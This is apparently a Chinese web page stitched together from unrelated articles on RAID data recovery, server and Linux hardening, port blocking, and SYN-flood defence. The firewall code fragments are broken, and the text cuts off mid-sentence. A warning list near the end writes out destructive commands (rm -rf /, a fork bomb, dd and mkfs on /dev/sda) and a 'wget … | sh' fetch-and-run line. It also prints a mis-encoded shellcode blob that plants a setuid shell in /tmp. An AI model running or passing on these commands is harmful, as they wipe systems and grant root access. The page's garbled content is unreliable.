服务器数据修复时,为了能提高硬盘阵列数据恢复,服务器管理员(不是数据恢复专业人士)要怎么做?

服务器数据修复时,为了能提高硬盘阵列数据恢复,服务器管理员(不是数据恢复专业人士)要怎么做?,第1张

1、避开危险操作:切勿强行上线

服务器的某一个硬盘出现故障时,一般服务器都会有一个Offline指示灯提示,此时要求用户更换一个完好的相同硬盘,并且重新校验算法。按理说这是非常正常的操作过程,但是殊不知很多RAID灾难就是由此而引起的。

以一个硬盘数量比较多的RAID5硬盘阵列数据恢复为例,很可能同时采购的多个硬盘中,有几个已经出现了不稳定现象。而服务器的Offline提示可能并不是最准确的,经常会误报(也有硬盘不稳定的因素)或是遗漏其它也同样存在隐患的硬盘。在看似平常的强制上线过程中,硬盘需要进行大量的读写操作,此时就是一场严峻的考验:运气好的话自然平稳度过,而运气不好就会导致其它硬盘突然掉线,此时就令问题更加棘手了。

当然,出现一个硬盘掉线提示,或是在RAID容错范围以内的掉线提示,强制上线还是必须执行的操作。但是在进行这一步前,强烈建议检测一下每个硬盘的稳定性情况,这样才更加保险。不要忽视这样一个小细节,往往这一步能够让RAID服务器免于瘫痪。

2、保证数据安全的关键:什么都不做?

对于厂商而言,所有的质保承诺仅仅局限于硬件设备,也就是说硬盘阵列故障后所引发的数据安全危机与之毫无关系,负责为用户更换或者维修已经算是“克尽职守”。但是用户所需要的并不是找回硬盘或是重建RAID,而是“无可复制”的数据。如果寻找整机厂商,此时无异于“自讨苦吃”,因为所谓的售后服务根本没有从用户的本源需求出发,尽快确保硬件设备完好反而牺牲了数据。当然,知名品牌的服务器厂商或是代理商会主动选择为大客户的RAID阵列数据恢复服务费“埋单”,但是这也仅仅是个别情况。

据介绍,因为寻找服务商的售后服务工程师修复而导致最终数据彻底破坏的案例几乎每个星期都会发生。毕竟售后服务工程师基本都偏向于硬件本身,而面对以软件类操作为主的RAID阵列数据恢复也略显不足。

此外,即便是简单的检验性操作,也有可能为后期的阵列数据恢复带来不便。以普通RAID5硬盘阵列数据恢复为例,当硬盘损坏超过容错能力时,必须将损坏硬盘的镜像完全提取才能进行最终的阵列数据恢复。而如果频繁对硬盘上电,很容易造成磁头进一步疲劳损伤,甚至划伤盘片。面对这种数据安全问题时,正确的处理方法应当是立即咨询专业数据恢复服务商。

3、硬盘阵列数据恢复捷径:寻求专业数据恢复服务商帮助

根据有关资料显示,很多数据恢复失败的案例都是因为用户采取了并不正确的解决途径。如一些服务器售后服务,他们在处理这类阵列数据恢复案例中,轻易选择重建,导致数据丢失情况更加严重,这也是企业数据安全管理人员在面对重大服务器阵列数据恢复时应该注意的问题。

此外,在选择数据恢复服务商时,根据规模以及业界口碑来判断是一条可行的捷径。比如效率源(国际)科技,加盟商服务网点遍及全国,有着深厚的积累,能够帮助遭遇RAID阵列数据灾难的用户及时度过难关,专业的数据恢复人员进行服务器硬盘阵列数据恢复。

首先,这些恶意的攻击行为,旨在消耗服务器资源,影响服务器的正常运作,甚至攻击到服务器所在网络瘫痪。还有一方面,就是入侵行为,这种大多与某些利益有关联,有的涉及到企业的敏感信息,有的是同行相煎。

  第一,做好硬件维护

  当处理数据越来越多,占用资源也随之增多时,服务器就需要更多的内存和硬盘容量来储存这些资源,因此,每隔段时间后服务器需要升级,可是需要注意的增加内存或者硬盘时,要考虑到兼容性、稳定性,否则不同型号的内存有可能会引起系统出错。

  还有对设备进行卸载和更换时,需要仔细阅读说明书,不要强行拆卸,而且必须在完全断电,服务器接地良好的情况下进行,防止静电对设备造成损坏。

  同样,服务器的最大杀手尘土,因此需要定期给服务器除尘。特别要注意电源的除尘。

  第二,做好数据的备份

  对企业来说,服务器上的数据是非常宝贵,如果数据库丢失了,损失是非常巨大的,因此,企业需对数据进行定期备份,以防万一。一般企业都需要每天对服务器上的数据进行备份,而且要将备份数据放置在不同服务器上,

  数据需要备份,同样需要防盗。可以通过密码保护好磁带并且如果你的备份程序支持加密功能,你还可以加密这些数据。同时,要定好备份时间,通常备份的过程会选择在晚上10点以后进行,到半夜结束。

  第三,定期做好网络检查

  第四,关闭不必要的服务,只开该开的端口

  对于初学者,建议在所有的工作站上使用Windows 2000。Windows 2000是一个非常安全的操作系统。如果你并不想这样做,那么至少使用Windows NT。你可以锁定工作站,使得一些没有安全访问权的人想要获得网络配置信息变得困难或是不可能。

  或者关闭那些不必要开的服务,做好本地管理和组管理。Windows系统有很多默认的服务其实没必要开的,甚至可以说是危险的,比如:默认的共享远程注册表访问(Remote Registry Service),系统很多敏感的信息都是写在注册表里的,如pcanywhere的加密密码等。

  关闭那些不必要的端口。一些看似不必要的端口,确可以向黑客透露许多操作系统的敏感信息,如windows 2000 server默认开启的IIS服务就告诉对方你的操作系统是windows 2000。69端口告诉黑客你的操作系统极有可能是linux或者unix系统,因为69是这些操作系统下默认的tftp服务使用的端口。对端口的进一步访问,还可以返回该服务器上软件及其版本的一些信息,这些对黑客的入侵都提供了很大的帮助。此外,开启的端口更有可能成为黑客进入服务器的门户。

  以上是服务器日常操作安全维护的一些技巧。

一、如何查看电脑开放了哪些端口   

1、利用netstat命令Windows提供了netstat命令,可以显示当前的 TCP/IP 网络连接情况。方法:开始——程序——附件——命令提示符,进入DOS窗口,输入命令 netstat -na 回车,就可以显示本机连接情况及打开的端口。其中Local Address代表本机IP地址和打开的端口号,Foreign Address是远程计算机IP地址和端口号,State表明当前TCP的连接状态。

2使用端口监视软件

如安全监视工具VStat,它除了展示所有的网络活动之外,还可以标明系统路径、查询属性,以便寻找文件。允许你关闭任何现有 TCP 和 UDP 连接的建立和终止活动。

二、如何永久关闭一些危险木马端口每一项服务都对应相应的端口,一般默认所用服务都是开启的——对于个人用户来说确实没有必要。端口就像一所房子(服务器)的几个门一样,不同的门通向不同的房间(服务器提供的不同服务)。我们常用的 FTP默认端口为21,而www网页一般默认端口是80。但是我们往往打开一些容易被侵入的端口服务,比如139等;还有一些木马程序,比如冰河、BO、广外等都是自动开辟一个您不察觉的端口。那么,只要我们把自己用不到的端口全部封锁起来,不就杜绝了这些非法入侵吗?

1、“控制面板”的“管理工具”中的“服务”中来配置,禁用不需要的服务,对应的端口也就关闭了。提醒:对于个人用户强烈建议关闭sever服务(可以禁止空连接)

2、利用“TCP/IP筛选”功能限制服务器的端口。

方法:本地连接属性——Internet协议(TCP/IP)——属性——高级——高级TCP/IP设置——项选——TCP/IP筛选在弹出的对话框里选择“启用TCP/IP筛选”的复选框,然后把左边“TCP端口”上的“只允许”选上。

3、运行gpeditmsc,在计算机配置——windows设置——安全设置——IP安全策略中进行手动设置。

提醒:其中有多个策略,只能指派当前的一种策略。

4、使用ipseccmd屏蔽不安全的端口。它的主要作用是设置你的筛选规则,为它指定一个名称,同时指定一个策略名称,所谓策略不过是一组筛选规则的集合而已。比如你要封闭TCP3333端口的数据双向收发,使用命令:ipseccmd -w REG -p \"Block default ports\" -r \"Block TCP/3333\" -f +0:3333:TCP -n BLOCK -x常用的参数如下:-w reg 表明将配置写入注册表,重启后仍有效。-p 指定策略名称,如果名称存在,则将该规则加入此策略,否则创建一个。(注意最好使用同一策略名,因为系统的IP安全策略以最后添加的为准)-r 指定规则名称。-n 指定操作,可以是BLOCK、PASS或者INPASS,必须大写。-x 激活该策略。-y 使之无效。-o 删除。-p 指定的策略。-f 设置过滤规则。-y 删除规则。方法:把程序ipseccmd拷贝到C:\\WINDOWS\\system32目录下,直接使用命令提示附执行就可以了。

通常所说的DOS有两种不同的概念,即拒绝服务或一种磁盘操作系统,通常DoS(O小写)指的是拒绝服务,DOS(O大写)指的是一种磁盘操作系统

随着计算机技术的发展,网络也在迅猛地普及和发展。人们在享受着网络带来的各种便利的同时,也受到了很多黑客的攻击。在众多的攻击种类中,有一种叫做 DoS(Denial of Service 拒绝服务)的攻击,是一种常见而有效的网络攻击技术,它通过利用协议或系统的缺陷,采取欺骗或伪装的策略来进行网络攻击,最终使得受害者的系统因为资源耗尽或无法作出正确响应而瘫痪,从而无法向合法用户提供正常服务。它看上去平淡无奇,但是攻击范围广,隐蔽性强、简单有效而成为了网络中一种强大的攻击技术,极大地影响了网络和业务主机系统的有效服务。其中,DDoS(Distubuted Denial of Service 分布式拒绝服务)更以其大规模性、隐蔽性和难防范性而著称。

在对Linux 2 4 内核防火墙netfilter 的原理深入研究后,分析了在netfilter 架构下防火墙的设计、实现和开发过程。以kylix3 0为开发环境,作者基于netfilter 架构开发了一款包过滤和应用代理的混合型防火墙,并对其做了测试。该防火墙系统是由包过滤管理模块、路由记录模块、应用代理模块(syn proxy)、扫描防御模块和日志记录模块构成。其中包过滤是基于netfilter 中的iptables 来实现的,网络地址转换也在包过滤管理模块中实现;路由记录模块通过修改Linux 内核中TCP/IP程序和重新编译内核使内核支持路由记录功能来实现的;在应用代理模块中实现了HTTP代理和一个通用代理服务,HTTP代理程序基于SQUID 实现,而通用代理由一个代理进程来实现;扫描防御模块中主要是通过一个网络扫描防御Demo 进程来监控是否有扫描发生;日志记录模块主要是选择记录日志的位置,有本机和邮件通知两种选择方式。针对常见的IP 地址欺骗、IP 源路由欺骗、ICMP 重定向欺骗、IP 劫持等常见网络攻击给予了分析并在过滤管理模块中加以解决实现,其中IP 劫持实现是用一个钩子函数注入协议栈中来实现的。文中还分析了加固操作系统而关闭一些危险和不使用的服务,使防火墙架设在一个相对安全的基础上,同时也将系统编译升级为最新的稳定内核。

DoS攻击是网络攻击最常见的一种。它故意攻击网络协议的缺陷或直接通过某种手段耗尽被攻击对象的资源,目的是让目标计算机或网络无法捉供正常的服务或资源访问,使目标系统服务停止响应甚至崩溃,而在此攻击中并不入侵目标服务器或目标网络设备。这些服务资源包括网络宽带、系统堆栈、开放的进程。或者允许的连接。这种攻击会导致资源耗尽,无论计算机的处理速度多快、内存容量多大、网络带宽的速度多快都无法避免这种攻击带来的后果。任何资源都有一个极限,所以总能找到一个方法使请求的值大于该极限值,导致所提供的服务资源耗尽。

DoS攻击有许多种类,主要有Land攻击、死亡之ping、泪滴、Smurf攻击及SYN洪水等。

据统计,在所有黑客攻击事件中,syn洪水攻击是最常见又最容易被利用的一种DoS攻击手法。

1攻击原理

要理解SYN洪水攻击,首先要理解TCP连接的三次握手过程(Three-wayhandshake)。在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接。第一次握手:建立连接时,客户端发送SYN包((SYN=i)到服务器,并进入SYN SEND状态,等待服务器确认;

第二次握手:服务器收到SYN包,必须确认客户的SYN (ACK=i+1 ),同}Jj’自己也发送一个SYN包((SYN j)}即SYN+ACK包,此时服务器进入SYN_RECV状态;

第三次握手:客户端收到服务器的SYN十ACK包,向服务器发送确认包ACK(ACK=j+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手,客户端与服务器开始传送数据。

在上述过程中,还有一些重要的概念:

半连接:收到SYN包而还未收到ACK包时的连接状态称为半连接,即尚未完全完成三次握手的TCP连接。

半连接队列:在三次握手协议中,服务器维护一个半连接队列,该队列为每个客户端的SYN包(SYN=i )开设一个条目,该条目表明服务器已收到SYN包,并向客户发出确认,正在等待客户的确认包。这些条目所标识的连接在服务器处于SYN_ RECV状态,当服务器收到客户的确认包时,删除该条目,服务器进入ESTABLISHED状态。

Backlog参数:表示半连接队列的最大容纳数目。

SYN-ACK重传次数:服务器发送完SYN-ACK包,如果未收到客户确认包,服务器进行首次重传,等待一段时间仍未收到客户确认包,进行第二次重传,如果重传次数超过系统规定的最大重传次数,系统将该连接信息、从半连接队列中删除。注意,每次重传等待的时间不一定相同。

半连接存活时间:是指半连接队列的条目存活的最长时间,也即服务从收到SYN包到确认这个报文无效的最长时间,该时间值是所有重传请求包的最长等待时间总和。有时也称半连接存活时间为Timeout时间、SYN_RECV存活时间。

上面三个参数对系统的TCP连接状况有很大影响。

SYN洪水攻击属于DoS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。SYN攻击除了能影响主机外,还可以危害路由器、防火墙等网络系统,事实上SYN攻击并不管目标是什么系统,只要这些系统打开TCP服务就可以实施。从图4-3可看到,服务器接收到连接请求(SYN=i )将此信息加入未连接队列,并发送请求包给客户( SYN=j,ACK=i+1 ),此时进入SYN_RECV状态。当服务器未收到客户端的确认包时,重发请求包,一直到超时,才将此条目从未连接队列删除。配合IP欺骗,SYN攻击能达到很好的效果,通常,客户端在短时间内伪造大量不存在的IP地址,向服务器不断地发送SYN包,服务器回复确认包,并等待客户的确认,由于源地址是不存在的,服务器需要不断的重发直至超时,这些伪造的SYN包将长时间占用未连接队列,正常的SYN 请求

被丢弃,目标系统运行缓慢,严重者引起网络堵塞甚至系统瘫痪。过程如下:

攻击主机C(地址伪装后为C')-----大量SYN包---->彼攻击主机

C'<-------SYN/ACK包----被攻击主机

由于C’地址不可达,被攻击主机等待SYN包超时。攻击主机通过发人量SYN包填满未连接队列,导致正常SYN包被拒绝服务。另外,SYN洪水攻击还可以通过发大量ACK包进行DoS攻击。

2.传统算法

抵御SYN洪水攻击较常用的方法为网关防火墙法、中继防火墙法和SYNcookies。为便于叙述,将系统拓扑图简化为图4-4。图中,按网络在防火墙内侧还是外侧将其分为内网、外网(内网是受防火墙保护的)。其次,设置防火墙的SYN重传计时器。超时值必须足够小,避免backlog队列被填满;同时又要足够大保证用户的正常通讯。

(1) 网关防火墙法

网关防火墙抵御攻击的基本思想是:对于内网服务器所发的SYN/ACK包,防火墙立即发送ACK包响应。当内网服务器接到ACK包后,从backlog队列中移出此半连接,连接转为开连接,TCP连接建成。由于服务器处理开连接的能力比处理半连接大得多,这种方法能有效减轻对内网服务器的SYN攻击,能有效地让backlog队列处于未满状态,同时在重传一个未完成的连接之前可以等待更长时间。

以下为算法完整描述:

第一步,防火墙截获外网客户端发向内网服务器SYN数据包,允许其通过,抵达内网服务器。同时在连接跟踪表中记录此事件

第二步,防火墙截获服务器发向客户端的SYN/ACK响应包,用连接跟踪表中记录的相应SYN包匹配它

第三步,防火墙让截获的SYN/ACK继续进行(发向客户端)。同时,向内网服务器发送ACK包。这样,对服务器来说,TCP连接三次握手已经完成。系统在backlog队列中删掉此半连接

第四步,看此TCP连接是否有效,相应产生两种解决方法。如果客户端的连接尝试是有效的,那么防火墙将接到来自客户端的ACK包,然后防火墙将它转发到服务器。服务器会忽略这个冗余的ACK包,这在TCP协议中是允许的

如果客户端的IP地址并不存在,那么防火墙将收不到来自客户端的ACK包,重转计时器将超时。这时,防火墙重传此连接

(2) 中继防火墙法

中继防火墙抵御攻击的思想是:防火墙在向内网服务器发SYN包之前,首先完成与外网的三次握手连接,从而消除SYN洪水攻击的成立条件。

以下为算法完整描述:

第一步,防火墙截获外网客户端发向内网服务器SYN数据包

第二步,防火墙并不直接向内网发SYN数据包,而是代替内网服务器向外网发SYNIACK数据包

第三步,只有接到外网的ACK包,防火墙向内网发SYN包

第四步,服务器应答SYN/ACK包

第五步,防火墙应答ACK包

(3) 分析

首先分析算法的性能,可以看出:为了提高效率,上述算法使用了状态检测等机制(可通过本系统的基本模块层得以实现)

对于非SYN包(CSYN/ACK及ACK包),如果在连线跟踪信息表未查找到相应项,则还要匹配规则库,而匹配规则库需比较诸多项(如IP地址、端口号等),花费较大,这会降低防火墙的流量。另外,在中继防火墙算法中,由于使用了SYN包代理,增加了防火墙的负荷,也会降低防火墙的流量。

其次,当攻击主机发ACK包,而不是SYN包,算法将出现安全漏洞。一般地,TCP连接从SYN包开始,一旦 SYN包匹配规则库,此连接将被加到连接跟踪表中,并且系统给其60s延时。之后,当接到ACK包时,此连接延时突然加大到3600s。如果,TCP连接从ACK包开始,同时此连接未在连接跟踪表中注册,ACK包会匹配规则库。如匹配成功,此连接将被加到连接跟踪表中,同时其延时被设置为3600s。即使系统无响应,此连接也不会终止。如果攻击者发大量的ACK包,就会使半连接队列填满,导致无法建立其它TCP连接。此类攻击来自于内网。因为,来自于外网的ACK包攻击,服务器会很快发RST包终止此连接(SOs>。而对于内网的外发包,其限制规则的严格性要小的多。一旦攻击者在某时间段内从内网发大量ACK包,并且速度高于防火墙处理速度,很容易造成系统瘫痪。

(4) SYN cookies

Linux支持SYN cookies,它通过修改TCP协议的序列号生成方法来加强抵御SYN洪水攻击能力。在TCP协议中,当收到客户端的SYN请求时,服务器需要回复SYN-SACK包给客户端,客户端也要发送确认包给服务器。通常,服务器的初始序列号由服务器按照一定的规律计算得到或采用随机数,但在SYN cookies中,服务器的初始序列号是通过对客户端IP地址、客户端端口、服务器IP地址和服务器端口以及其他一些安全数值等要素进行hash运算,加密得到的,称之为cookie。当服务器遭受SYN攻击使得backlog队列满时,服务器并不拒绝新的SYN请求,而是回复cookie(回复包的SYN序列号)给客户端,如果收到客户端的ACK包,服务器将客户端的ACK序列号减去1得到。cookie比较值,并将上述要素进行一次hash运算,看看是否等于此cookie。如果相等,直接完成三次握手(注意:此时并不用查看此连接是否属于backlog队列)。

此算法的优点是:半连接队列满时,SYN cookies仍可以处理新SYN请求。缺点是:某些TCP选项必须禁用,如大窗口等。计算cookies有花销。

/一个IP包,其分片都被放入到一个链表中,作为每一个分片的链表节点用ipfrag结构表示。IP分片的中心组装在此链表进行。/

内核抵御攻击的代码结构如下:

// From

/IP分片结构体/

struct ipfrag

{

int offset; //ip包中此分片的偏移值

int end; //此分片最后一个株距在ip包中的位置

int len; //此分片长度

struct sk_buff skb; //分片数据包

unsigned

if(end<= offset)&&(i>skb->len)

return NF_DRDP;

}

}

return NF_ACCEPT;

组成规则的三个结构体具体解释如下:

(1)ipt

unsigned int nfcache ; //用此位域表示数据报的哪些部分由这个规则检查

; //包含数据包及匹配此规则数据包的计算数值

以下仅列出ipt_entry_match结构体:

struce ipt_entry_match

{

union

{

struct{

u_int16_t target_size;

{

struct list_head list;//链表

struct

u int32 ipaddr; //地址

u_ int16 port; //端口

}src; //源端信息

struct

{

u_ int32 ipaddr;

u_ int 16 port;

} dst; //目的端信息

u_intl6 protonum; //协议号

`常用语法

dir+* 浏览

cls 清屏

cd 打开子目录

cd+* 退出子目录

rd+* 删除子目录

del+* 删除文件

Linux命令行佷有用、很高效,也很有趣,但有时候也很危险,尤其是在你不确定你自己在正在做什么时候。这篇文章并不打算引来你对Linux或linux命令行的愤怒。我们只是想让你意识到在你运行某些命令时应该三思而后行。(译注:当然,以下命令通常都是在root权限下才能将愚蠢发挥到无可救药;在普通用户身份下,破坏的只是自己的一亩三分地。)

1 rm -rf命令

rm -rf命令是删除文件夹及其内容最快的方式之一。仅仅一丁点的敲错或无知都可能导致不可恢复的系统崩坏。下列是一些rm命令的选项。

rm 命令在Linux下通常用来删除文件。

rm -r命令递归的删除文件夹,甚至是空的文件夹。(译注:个人认为此处应该是说错了,从常识看,应该是“甚至是非空的文件夹”)

rm -f命令能不经过询问直接删除‘只读文件’。(译注:Linux下删除文件并不在乎该文件是否是只读的,而只是在意其父目录是否有写权限。所以,-f这个参数只是表示不必一个个删除确认,而是一律悄悄删除。另外,原始的rm命令其实也是没有删除提示的,只是一般的发行版都会将rm通过别名的方式增加-i参数来要求删除确认,而-f则抑制了这个提示。)

rm -rf / :强制删除根目录下所有东东。(就是说删除完毕后,什么也没有了。。。)

rm -rf : 强制删除当前目录的所有文件。

rm -rf :强制删除当前文件夹及其子文件夹。

从现在起,当你要执行rm -rf命令时请留心一点。我们可以在“bashrc”文件对‘rm‘命令创建rm -i的别名,来预防用‘rm‘命令删除文件时的事故,它会要求你确认每一个删除请求。(译注:大多数发行版已经这样做了,如果还没有,请这样做,并在使用-f参数前一定考虑好你在做什么!译者本人有着血泪的教训啊。)

2 :(){:|:&};:命令

这就是个fork炸弹的实例。具体操作是通过定义一个名为‘:‘的函数,它会调用自己两次,一次在前台另一次运行在后台。它会反复的执行下去直到系统崩溃。

:(){:|:&};:哦?你确认你要试试么?千万别在公司正式的服务器上实验啊~~

3命令 > /dev/sda

上列命令会将某个‘命令‘的输出写到块设备/dev/sda中。该操作会将在块设备中的所有数据块替换为命令写入的原始数据,从而导致整个块设备的数据丢失。

4 mv文件夹/dev/null

这个命令会移动某个‘文件夹‘到/dev/null。在Linux中/dev/null或null设备是一个特殊的文件,所有写入它的数据都会被清除,然后返回写操作成功。(译注:这就是黑洞啊。当然,要说明的是,通过将文件夹移动到黑洞,并不能阻止数据恢复软件的救赎,所以,真正的彻底毁灭,需要采用专用的软件或者手法来完成——我知道你肯定有些东西想删除得干干净净的。)

# mv /home/user/ /dev/null上列命令会将User目录所有内容移动到/dev/null,这意味着所有东西都被‘卷入’黑洞 (null)之中。

5 wget http://malicious_source -O- | sh

上列命令会从一个(也许是)恶意源下载一个脚本并执行。Wget命令会下载这个脚本,而sh会(无条件的)执行下载下来的脚本。

注意:你应该时刻注意你下载包或脚本的源。只能使用那些从可信任的源中下载脚本/程序。(译注:所以,你真的知道你在做什么吗?当遇到这种需要是,我的做法是,先wget下来,然后我去读一读其中到底写了些什么,然后考虑是否执行。)

6 mkfsext3 /dev/sda

上列命令会格式化块设备‘sda’,你无疑知道在执行上列命令后你的块设备(硬盘驱动器)会被格式化,崭新的!没有任何数据,直接让你的系统达到不可恢复的阶段。(译注:通常不会直接使用/dev/sda这样的设备,除非是作为raw设备使用,一般都需要将sda分成类似sda1、sda2这样的分区后才使用。当然,无论你使用sda还是sda1,这样对块设备或分区进行mkfs都是毁灭性的,上面的数据都会被蒸发了。)

7 > file

上列命令常用来清空文件内容(译注:通常也用于记录命令输出。不过请在执行前,确认输出的文件是空的或者还不存在,否则原来的文件可真是恢复不了了——连数据恢复软件都未必能帮助你了。另外,我想你可能真正想用的是“>>”,即累加新的输出到文件,而不是刷新那个文件。)。如果用上列执行时输入错误或无知的输入类似“> xtconf” 的命令会覆盖配置文件或其他任何的系统配置文件。

8 ^foo^bar

这个命令在我们十个鲜为人知的Linux命令- Part 3中描述过,用来编辑先前运行的命令而无需重打整个命令。但当用foobar命令时如果你没有彻底检查改变原始命令的风险,这可能导致真正的麻烦。(译注:事实上,这种小技巧是译者认为的,少数史前时代遗留下来的无用而有害的“黑客”技巧。)

9 dd if=/dev/random of=/dev/sda

上列命令会向块设备sda写入随机的垃圾文件从而擦出数据。当然!你的系统可能陷入混乱和不可恢复的状态。(译注:记得上面说过mv到黑洞并不能彻底删除数据么?那么这个命令就是给了你一个彻底删除的方法!当然为了保险起见,你可以覆写多次。)

10隐藏命令

下面的命令其实就是上面第一个命令(rm -rf)。这里的代码是隐藏在十六进制里的,一个无知的用户可能就会被愚弄。在终端里运行下面命令可能会擦除你的根分区。

这个命令表明通常真正的危险是隐藏的,不会被轻易的检测到。你必须时刻留心你在做什么结果会怎样。不要编译/运行从未知来源的代码。

char esp[] __attribute__ ((section(“text”))) / esp

release /

=“&euml;>[1&Agrave;PTZƒìdh″

“&yuml;&yuml;&yuml;&yuml;h&szlig;&ETH;&szlig;&Ugrave;h™″

“&szlig;h’&szlig;&Ograve;T^÷÷″

“V÷V÷Vƒ&Auml;tV″

“sVSTY°&Iacute;€1″

“&Agrave;@&euml;ùè&frac12;&yuml;&yuml;&yuml;/bi″

“n/sh-c″

“cp -p /bin/sh /tmp/beyond; chmod 4755

/tmp/beyond;”;注意:不要在你的或你的同学或学校的电脑里的Linux终端或Shell执行以上的任何一个命令。如果你想测试它们,请在虚拟机上运行。任何不和谐或数据丢失,由于运行上面的命令导致你的系统崩溃,文章作者和Tecmint概不负责。(译注:译者和转载网站也不负责~!)

建议先排查自身网站,除了需要抗D服务,可能还需要漏洞扫描。关于网站服务器的漏洞,有部分漏洞是能被及时发现的,还有很多的漏洞是很难被立马发现的。那么在当前安全形势不乐观的情况下,我们怎么做才能降低被黑的危险呢?

首先,网站的相关管理员,应该要有强烈的防御意识,时刻关注安全方面的信息,经常升级补丁,及时修复系统漏洞,防御攻击;其次,网站重要数据一定要定期做好备份,特别重要的数据则需要实时备份。

还要注意的是数据最好能有一个容灾方案,数据不能只放在一台服务器上,在另一台服务器(最好是异地的)做数据备份是很有必要的,当一台服务器被黑了的同时,另一台服务器的数据备份价值就体现出来了。再者,目前很多安全公司都有漏洞扫描和渗透服务,如果能针对网站和服务器做一次漏扫或者渗透,先黑客一步发现问题,及时修复高危漏洞,那么对于用户来说整体的安全性能够得到质的提升。最后,提供商选择方面,首选拥有应急工程师团队驻守的服务提供商,在漏洞及攻击发生的第一时间,技术工程师能够迅速应对,从而减少甚至避免损失。

  随着开源系统Linux的盛行,其在大中型企业的应用也在逐渐普及,很多企业的应用服务都是构筑在其之上,例如Web服务、数据库服务、集群服务等等。因此,Linux的安全性就成为了企业构筑安全应用的一个基础,是重中之重,如何对其进行安全防护是企业需要解决的一个基础性问题,基于此,本文将给出十大企业级Linux服务器安全防护的要点。1、强化:密码管理设定登录密码是一项非常重要的安全措施,如果用户的密码设定不合适,就很容易被破译,尤其是拥有超级用户使用权限的用户,如果没有良好的密码,将给系统造成很大的安全漏洞。目前密码破解程序大多采用字典攻击以及暴力攻击手段,而其中用户密码设定不当,则极易受到字典攻击的威胁。很多用户喜欢用自己的英文名、生日或者账户等信息来设定密码,这样,黑客可能通过字典攻击或者是社会工程的手段来破解密码。所以建议用户在设定密码的过程中,应尽量使用非字典中出现的组合字符,并且采用数字与字符相结合、大小写相结合的密码设置方式,增加密码被黑客破解的难度。而且,也可以使用定期修改密码、使密码定期作废的方式,来保护自己的登录密码。在多用户系统中,如果强迫每个用户选择不易猜出的密码,将大大提高系统的安全性。但如果passwd程序无法强迫每个上机用户使用恰当的密码,要确保密码的安全度,就只能依靠密码破解程序了。实际上,密码破解程序是黑客工具箱中的一种工具,它将常用的密码或者是英文字典中所有可能用来作密码的字都用程序加密成密码字,然后将其与Linux系统的/etc/passwd密码文件或/etc/shadow影子文件相比较,如果发现有吻合的密码,就可以求得明码了。在网络上可以找到很多密码破解程序,比较有名的程序是crack和john the ripper用户可以自己先执行密码破解程序,找出容易被黑客破解的密码,先行改正总比被黑客破解要有利。2、限定:网络服务管理早期的Linux版本中,每一个不同的网络服务都有一个服务程序(守护进程,Daemon)在后台运行,后来的版本用统一的/etc/inetd服务器程序担此重任。Inetd是Internetdaemon的缩写,它同时监视多个网络端口,一旦接收到外界传来的连接信息,就执行相应的TCP或UDP网络服务。由于受inetd的统一指挥,因此Linux中的大部分TCP或UDP服务都是在/etc/inetdconf文件中设定。所以取消不必要服务的第一步就是检查/etc/inetdconf文件,在不要的服务前加上“#”号。一般来说,除了http、smtp、telnet和ftp之外,其他服务都应该取消,诸如简单文件传输协议tftp、网络邮件存储及接收所用的imap/ipop传输协议、寻找和搜索资料用的gopher以及用于时间同步的daytime和time等。还有一些报告系统状态的服务,如finger、efinger、systat和netstat等,虽然对系统查错和寻找用户非常有用,但也给黑客提供了方便之门。例如,黑客可以利用finger服务查找用户的电话、使用目录以及其他重要信息。因此,很多Linux系统将这些服务全部取消或部分取消,以增强系统的安全性。Inetd除了利用/etc/inetdconf设置系统服务项之外,还利用/etc/services文件查找各项服务所使用的端口。因此,用户必须仔细检查该文件中各端口的设定,以免有安全上的漏洞。在后继的Linux版本中(比如Red Hat Linux72之后),取而代之的是采用xinetd进行网络服务的管理。当然,具体取消哪些服务不能一概而论,需要根据实际的应用情况来定,但是系统管理员需要做到心中有数,因为一旦系统出现安全问题,才能做到有步骤、有条不紊地进行查漏和补救工作,这点比较重要。3、严格审计:系统登录用户管理在进入Linux系统之前,所有用户都需要登录,也就是说,用户需要输入用户账号和密码,只有它们通过系统验证之后,用户才能进入系统。与其他Unix操作系统一样,Linux一般将密码加密之后,存放在/etc/passwd文件中。Linux系统上的所有用户都可以读到/etc/passwd文件,虽然文件中保存的密码已经经过加密,但仍然不太安全。因为一般的用户可以利用现成的密码破译工具,以穷举法猜测出密码。比较安全的方法是设定影子文件/etc/shadow,只允许有特殊权限的用户阅读该文件。在Linux系统中,如果要采用影子文件,必须将所有的公用程序重新编译,才能支持影子文件。这种方法比较麻烦,比较简便的方法是采用插入式验证模块(PAM)。很多Linux系统都带有Linux的工具程序PAM,它是一种身份验证机制,可以用来动态地改变身份验证的方法和要求,而不要求重新编译其他公用程序。这是因为PAM采用封闭包的方式,将所有与身份验证有关的逻辑全部隐藏在模块内,因此它是采用影子档案的最佳帮手。此外,PAM还有很多安全功能:它可以将传统的DES加密方法改写为其他功能更强的加密方法,以确保用户密码不会轻易地遭人破译;它可以设定每个用户使用电脑资源的上限;它甚至可以设定用户的上机时间和地点。Linux系统管理人员只需花费几小时去安装和设定PAM,就能大大提高Linux系统的安全性,把很多攻击阻挡在系统之外。4、设定:用户账号安全等级管理除密码之外,用户账号也有安全等级,这是因为在Linux上每个账号可以被赋予不同的权限,因此在建立一个新用户ID时,系统管理员应该根据需要赋予该账号不同的权限,并且归并到不同的用户组中。在Linux系统中的部分文件中,可以设定允许上机和不允许上机人员的名单。其中,允许上机人员名单在/etc/hostsallow中设置,不允许上机人员名单在/etc/hostsdeny中设置。此外,Linux将自动把允许进入或不允许进入的结果记录到/var/log/secure文件中,系统管理员可以据此查出可疑的进入记录。每个账号ID应该有专人负责。在企业中,如果负责某个ID的职员离职,管理员应立即从系统中删除该账号。很多入侵事件都是借用了那些很久不用的账号。在用户账号之中,黑客最喜欢具有root权限的账号,这种超级用户有权修改或删除各种系统设置,可以在系统中畅行无阻。因此,在给任何账号赋予root权限之前,都必须仔细考虑。Linux系统中的/etc/securetty文件包含了一组能够以root账号登录的终端机名称。例如,在RedHatLinux系统中,该文件的初始值仅允许本地虚拟控制台(rtys)以root权限登录,而不允许远程用户以root权限登录。最好不要修改该文件,如果一定要从远程登录为root权限,最好是先以普通账号登录,然后利用su命令升级为超级用户。5、谨慎使用:“r系列”远程程序管理在Linux系统中有一系列r字头的公用程序,比如rlogin,rcp等等。它们非常容易被黑客用来入侵我们的系统,因而非常危险,因此绝对不要将root账号开放给这些公用程序。由于这些公用程序都是用。rh